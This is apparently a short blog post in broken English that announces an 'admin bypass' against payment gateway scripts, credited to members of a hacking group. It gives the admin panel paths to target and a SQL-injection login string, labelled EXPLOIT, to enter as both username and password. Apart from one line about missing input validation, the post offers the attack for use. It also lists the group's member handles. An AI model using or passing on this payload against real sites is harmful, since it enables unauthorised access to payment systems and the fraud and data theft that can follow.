sir.h4m1d Find Admin Bypass Scripts Payment Gateway Bug

Hackers from the Iran Cyber Security Group is make discover of way to bypass access to payment gateways

sir.h4m1d of Iran Cyber Security Group is make discover:

Admin Bypass Scripts Payment Gateway

Full detail is here is show that bypass is simple:

http://www.Site.com/pay/admin/ or /payment/admin/

EXPLOIT:

Username: ‘=’ ‘OR’

Password: ‘=’ ‘OR’

Affected sites is insecure as do not have input validation to disallow user/password of ‘=’ ‘OR’ and is allow access to systems

All bugs discover by Iran Cyber Security Group is here

Iran Cyber Security Group member: MOHAMAD-NOFOZI , root3r , sir.h4m1d , Promis , white.wolf , mr.s4jj4d , mr.turk , 0day , pi.hack , l3gi0n , nazanin_wild , 0xdevil

Contact mail: [email protected]
Team Web site: http://iran-cyber.net

Leave a Reply

Your email address will not be published. Required fields are marked *